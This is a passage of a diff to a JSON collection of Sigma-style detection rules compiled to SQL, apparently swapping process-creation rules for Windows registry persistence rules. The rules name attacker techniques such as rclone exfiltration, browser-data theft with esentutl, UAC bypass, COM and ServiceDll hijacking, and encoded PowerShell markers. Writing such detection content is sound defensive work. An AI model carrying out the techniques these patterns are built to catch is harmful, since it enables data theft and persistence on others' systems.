'\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "status": "experimental", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE 
'/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript 
executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - 
"author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 
'%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ "attack.defense_evasion", - "attack.t1036", - 
"attack.t1202", - "attack.t1027.003" + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1112" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE 
'\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel 
= 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Software installation" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "status": "experimental", - "description": "One way Qbot steals 
sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "author": "frack113", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Monitor the creation of a new 
key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft 
Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "status": "experimental", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the dll." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' 